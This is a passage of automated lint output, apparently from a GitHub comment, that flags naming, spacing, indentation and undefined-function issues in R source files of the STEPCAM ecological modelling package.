^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:152:30:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/ABC_SMC.R#L152) *style:* **Variable and function names should be all lowercase.**\n```r\n​    while (numberAccepted <= numParticles) {\n                             ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:156:19:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/ABC_SMC.R#L156) *style:* **Variable and function names should be all lowercase.**\n```r\n​        params <- getRandomVals(species_fallout)\n                  ^~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:156:19:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/ABC_SMC.R#L156) *warning:* **no visible global function definition for ‘getRandomVals’**\n```r\n​        params <- getRandomVals(species_fallout)\n                  ^~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:158:19:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/ABC_SMC.R#L158) *style:* **Variable and function names should be all lowercase.**\n```r\n​        params <- getFromPrevious(indices, weights,\n                  ^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:160:19:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/ABC_SMC.R#L160) *warning:* **no visible global function definition for ‘perturb’**\n```r\n​        params <- perturb(params, sigma)\n                  ^~~~~~~\n```\n[R/ABC_SMC.R:170:1:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/ABC_SMC.R#L170) *style:* **Trailing whitespace is superfluous.**\n```r\n​     \n^~~~~\n```\n[R/ABC_SMC.R:174:40:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/ABC_SMC.R#L174) *style:* **Commas should always have a space after.**\n```r\n​      traits <- as.data.frame(species[,c(2:(n_traits+1))],\n                                       ^\n```\n[R/ABC_SMC.R:174:53:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/ABC_SMC.R#L174) *style:* **Put spaces around all infix operators.**\n```r\n​      traits <- as.data.frame(species[,c(2:(n_traits+1))],\n                                                   ~^~\n```\n[R/ABC_SMC.R:175:40:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/ABC_SMC.R#L175) *style:* **Put spaces around all infix operators.**\n```r\n​                              row.names=c(1:taxa))\n                                      ~^~\n```\n[R/ABC_SMC.R:179:1:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/ABC_SMC.R#L179) *style:* **Trailing whitespace is superfluous.**\n```r\n​      \n^~~~~~\n```\n[R/ABC_SMC.R:180:20:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/ABC_SMC.R#L180) *style:* **Variable and function names should be all lowercase.**\n```r\n​      FD_output <- strippedDbFd(Ord, communities, \n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:180:50:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/ABC_SMC.R#L180) *style:* **Trailing whitespace is superfluous.**\n```r\n​      FD_output <- strippedDbFd(Ord, communities, \n                                                 ^\n```\n[R/ABC_SMC.R:181:64:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/ABC_SMC.R#L181) *style:* **Trailing whitespace is superfluous.**\n```r\n​                                m = res[[1]], nb.sp = res[[2]]) \n                                                               ^\n```\n[R/ABC_SMC.R:182:1:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/ABC_SMC.R#L182) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/ABC_SMC.R:184:29:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/ABC_SMC.R#L184) *style:* **Trailing whitespace is superfluous.**\n```r\n​      FRic <- FD_output$FRic \n                            ^\n```\n[R/ABC_SMC.R:186:29:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/ABC_SMC.R#L186) *style:* **Trailing whitespace is superfluous.**\n```r\n​      FEve <- FD_output$FEve \n                            ^\n```\n[R/ABC_SMC.R:188:29:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/ABC_SMC.R#L188) *style:* **Trailing whitespace is superfluous.**\n```r\n​      FDiv <- FD_output$FDiv \n                            ^\n```\n[R/ABC_SMC.R:197:69:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/ABC_SMC.R#L197) *style:* **Trailing whitespace is superfluous.**\n```r\n​      # calculate distance of trait mean between simulated community \n                                                                    ^\n```\n[R/ABC_SMC.R:201:72:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/ABC_SMC.R#L201) *style:* **Trailing whitespace is superfluous.**\n```r\n​      # (inverse) fit of model: euclidian distance of FD and trait mean \n                                                                       ^\n```\n[R/ABC_SMC.R:203:14:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/ABC_SMC.R#L203) *style:* **Variable and function names should be all lowercase.**\n```r\n​      fit <- calculateDistance(FRic[[1]], FEve[[1]], FDiv[[1]],\n             ^~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:205:1:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/ABC_SMC.R#L205) *style:* **Trailing whitespace is superfluous.**\n```r\n​      \n^~~~~~\n```\n[R/ABC_SMC.R:208:19:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/ABC_SMC.R#L208) *style:* **Variable and function names should be all lowercase.**\n```r\n​        next_disp[numberAccepted] <- params[1]\n                  ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:209:19:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/ABC_SMC.R#L209) *style:* **Variable and function names should be all lowercase.**\n```r\n​        next_filt[numberAccepted] <- params[2]\n                  ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:210:19:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/ABC_SMC.R#L210) *style:* **Variable and function names should be all lowercase.**\n```r\n​        next_comp[numberAccepted] <- params[3]\n                  ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:212:14:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/ABC_SMC.R#L212) *style:* **Variable and function names should be all lowercase.**\n```r\n​        fits[numberAccepted] <- fit\n             ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:213:18:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/ABC_SMC.R#L213) *style:* **Variable and function names should be all lowercase.**\n```r\n​        rich_vec[numberAccepted] <- FRic[[1]]\n                 ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:214:17:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/ABC_SMC.R#L214) *style:* **Variable and function names should be all lowercase.**\n```r\n​        eve_vec[numberAccepted] <- FEve[[1]]\n                ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:215:17:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/ABC_SMC.R#L215) *style:* **Variable and function names should be all lowercase.**\n```r\n​        div_vec[numberAccepted] <- FDiv[[1]]\n                ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:216:17:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/ABC_SMC.R#L216) *style:* **Variable and function names should be all lowercase.**\n```r\n​        opt_vec[numberAccepted] <- mean_optimum\n                ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:219:24:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/ABC_SMC.R#L219) *style:* **Variable and function names should be all lowercase.**\n```r\n​          next_weights[numberAccepted] <- 1\n                       ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:221:24:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/ABC_SMC.R#L221) *style:* **Variable and function names should be all lowercase.**\n```r\n​          next_weights[numberAccepted] <-\n                       ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:222:13:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/ABC_SMC.R#L222) *style:* **Variable and function names should be all lowercase.**\n```r\n​            calculateWeight(params, changed, sigma, disp_vals, filt_vals,\n            ^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:225:9:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/ABC_SMC.R#L225) *style:* **Variable and function names should be all lowercase.**\n```r\n​        numberAccepted <- numberAccepted + 1\n        ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:225:27:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/ABC_SMC.R#L225) *style:* **Variable and function names should be all lowercase.**\n```r\n​        numberAccepted <- numberAccepted + 1\n                          ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:226:13:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/ABC_SMC.R#L226) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​        if ((numberAccepted) %% (numParticles / PRINT_FREQ) == 0) {\n            ^\n```\n[R/ABC_SMC.R:226:14:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/ABC_SMC.R#L226) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if ((numberAccepted) %% (numParticles / PRINT_FREQ) == 0) {\n             ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:226:34:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/ABC_SMC.R#L226) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if ((numberAccepted) %% (numParticles / PRINT_FREQ) == 0) {\n                                 ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:233:21:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/ABC_SMC.R#L233) *style:* **Put spaces around all infix operators.**\n```r\n​      if (tried > (1/stopRate) && tried > 50)  {\n                   ~^~\n```\n[R/ABC_SMC.R:233:22:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/ABC_SMC.R#L233) *style:* **Variable and function names should be all lowercase.**\n```r\n​      if (tried > (1/stopRate) && tried > 50)  {\n                     ^~~~~~~~\n```\n[R/ABC_SMC.R:235:13:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/ABC_SMC.R#L235) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if (numberAccepted / tried < stopRate) {\n            ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:235:38:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/ABC_SMC.R#L235) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if (numberAccepted / tried < stopRate) {\n                                     ^~~~~~~~\n```\n[R/ABC_SMC.R:255:54:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/ABC_SMC.R#L255) *style:* **Put spaces around all infix operators.**\n```r\n​    file_name <- paste(\"particles_t=\", t, \".txt\", sep=\"\", collapse = NULL)\n                                                    ~^~\n```\n[R/ABC_SMC.R:258:64:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/ABC_SMC.R#L258) *style:* **Trailing whitespace is superfluous.**\n```r\n​    cat(\" \", mean(disp_vals), mean(filt_vals), mean(comp_vals), \n                                                               ^\n```\n[R/ABC_SMC.R:259:33:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/ABC_SMC.R#L259) *style:* **Variable and function names should be all lowercase.**\n```r\n​        \"\\t\", \"accept rate = \", numberAccepted / (tried-1), \"\\n\")\n                                ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:259:56:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/ABC_SMC.R#L259) *style:* **Put spaces around all infix operators.**\n```r\n​        \"\\t\", \"accept rate = \", numberAccepted / (tried-1), \"\\n\")\n                                                      ~^~\n```\n[R/ABC_SMC.R:262:27:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/ABC_SMC.R#L262) *style:* **Commas should always have a space after.**\n```r\n​    next_weights <- rep(1,numParticles)\n                          ^\n```\n[R/ABC_SMC.R:262:27:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/ABC_SMC.R#L262) *style:* **Variable and function names should be all lowercase.**\n```r\n​    next_weights <- rep(1,numParticles)\n                          ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:263:20:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/ABC_SMC.R#L263) *style:* **Variable and function names should be all lowercase.**\n```r\n​    next_disp <- 1:numParticles\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:264:20:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/ABC_SMC.R#L264) *style:* **Variable and function names should be all lowercase.**\n```r\n​    next_filt <- 1:numParticles\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:265:20:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/ABC_SMC.R#L265) *style:* **Variable and function names should be all lowercase.**\n```r\n​    next_comp <- 1:numParticles\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:275:61:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/ABC_SMC.R#L275) *style:* **Put spaces around all infix operators.**\n```r\n​    d <- read.table(paste(\"particles_t=\", t - 1, \".txt\", sep=\"\",\n                                                           ~^~\n```\n[R/ABC_SMC.R:279:40:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/ABC_SMC.R#L279) *style:* **Trailing whitespace is superfluous.**\n```r\n​           \"Can't stop at iteration 1 - \n                                       ^\n```\n[R/ABC_SMC.R:280:57:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/ABC_SMC.R#L280) *style:* **Trailing whitespace is superfluous.**\n```r\n​           please set stop_at_iteration to 2 if you only \n                                                        ^\n```\n[R/generateArtificialData.R:5:1:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L5) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​generate.Artificial.Data <- function(n_species, n_traits, n_communities,\n^~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:6:1:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L6) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tpool_richness <- n_species\n^\n```\n[R/generateArtificialData.R:8:1:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L8) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n^\n```\n[R/generateArtificialData.R:9:1:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L9) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                                    mean = 0, sd = 1), 3),\n^\n```\n[R/generateArtificialData.R:10:1:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L10) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                       ncol = n_traits, nrow = pool_richness)\n^\n```\n[R/generateArtificialData.R:10:23:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L10) *style:* **Put spaces around all infix operators.**\n```r\n​\tpool_richness <- n_species\n                     ~^~~\n```\n[R/generateArtificialData.R:12:21:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L12) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                   ~^~~\n```\n[R/generateArtificialData.R:12:47:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L12) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                                             ~^~\n```\n[R/generateArtificialData.R:12:49:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L12) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                                                ^\n```\n[R/generateArtificialData.R:12:64:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L12) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                                                              ~^~\n```\n[R/generateArtificialData.R:13:1:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L13) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor(i in 1:pool_richness) {\n^\n```\n[R/generateArtificialData.R:13:50:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L13) *style:* **Put spaces around all infix operators.**\n```r\n​\t                                    mean = 0, sd = 1), 3),\n                                                ~^~\n```\n[R/generateArtificialData.R:13:58:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L13) *style:* **Put spaces around all infix operators.**\n```r\n​\t                                    mean = 0, sd = 1), 3),\n                                                        ~^~\n```\n[R/generateArtificialData.R:14:1:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L14) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  column1[i] <- paste(\"species\", i, sep = \"\")\n^\n```\n[R/generateArtificialData.R:14:37:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L14) *style:* **Put spaces around all infix operators.**\n```r\n​\t                       ncol = n_traits, nrow = pool_richness)\n                                   ~^~\n```\n[R/generateArtificialData.R:14:54:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L14) *style:* **Put spaces around all infix operators.**\n```r\n​\t                       ncol = n_traits, nrow = pool_richness)\n                                                    ~^~\n```\n[R/generateArtificialData.R:15:1:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L15) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:16:1:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L16) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trow1 <- rep(NA, (n_traits + 1))\n^\n```\n[R/generateArtificialData.R:17:1:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L17) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor(i in 1:n_traits + 1) {\n^\n```\n[R/generateArtificialData.R:17:12:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L17) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor(i in 1:pool_richness) {\n           ^\n```\n[R/generateArtificialData.R:18:1:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L18) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n^\n```\n[R/generateArtificialData.R:18:22:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L18) *style:* **Put spaces around all infix operators.**\n```r\n​\t  column1[i] <- paste(\"species\", i, sep = \"\")\n                    ~^~~\n```\n[R/generateArtificialData.R:19:1:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L19) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:20:1:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L20) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trow1[1] <- \"species\"\n^\n```\n[R/generateArtificialData.R:20:14:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L20) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1 <- rep(NA, (n_traits + 1))\n            ~^~~\n```\n[R/generateArtificialData.R:20:25:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L20) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\trow1 <- rep(NA, (n_traits + 1))\n                        ^\n```\n[R/generateArtificialData.R:21:1:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L21) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcolumns <- matrix( cbind( column1, traits_pool), ncol = (n_traits + 1))\n^\n```\n[R/generateArtificialData.R:21:12:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L21) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor(i in 1:n_traits + 1) {\n           ^\n```\n[R/generateArtificialData.R:22:1:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L22) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\ttraits_pool_df <- as.data.frame(columns)\n^\n```\n[R/generateArtificialData.R:22:19:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L22) *style:* **Put spaces around all infix operators.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n                 ~^~~\n```\n[R/generateArtificialData.R:22:37:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L22) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n                                    ^\n```\n[R/generateArtificialData.R:22:40:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L22) *style:* **Put spaces around all infix operators.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n                                      ~^~\n```\n[R/generateArtificialData.R:23:1:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L23) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tnames(traits_pool_df) <- row1\n^\n```\n[R/generateArtificialData.R:24:17:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L24) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1[1] <- \"species\"\n               ~^~~\n```\n[R/generateArtificialData.R:25:1:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L25) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n^\n```\n[R/generateArtificialData.R:25:17:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L25) *style:* **Put spaces around all infix operators.**\n```r\n​\tcolumns <- matrix( cbind( column1, traits_pool), ncol = (n_traits + 1))\n               ~^~~\n```\n[R/generateArtificialData.R:25:63:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L25) *style:* **Put spaces around all infix operators.**\n```r\n​\tcolumns <- matrix( cbind( column1, traits_pool), ncol = (n_traits + 1))\n                                                             ~^~\n```\n[R/generateArtificialData.R:25:65:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L25) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tcolumns <- matrix( cbind( column1, traits_pool), ncol = (n_traits + 1))\n                                                                ^\n```\n[R/generateArtificialData.R:26:24:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L26) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool_df <- as.data.frame(columns)\n                      ~^~~\n```\n[R/generateArtificialData.R:27:31:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L27) *style:* **Put spaces around all infix operators.**\n```r\n​\tnames(traits_pool_df) <- row1\n                             ~^~~\n```\n[R/generateArtificialData.R:28:1:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L28) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\toccurence <- 10 ^ rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n^\n```\n[R/generateArtificialData.R:29:26:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L29) *style:* **Put spaces around all infix operators.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n                        ~^~~\n```\n[R/generateArtificialData.R:29:43:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L29) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n                                          ^\n```\n[R/generateArtificialData.R:29:58:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L29) *style:* **Put spaces around all infix operators.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n                                                        ~^~\n```\n[R/generateArtificialData.R:30:1:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L30) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * 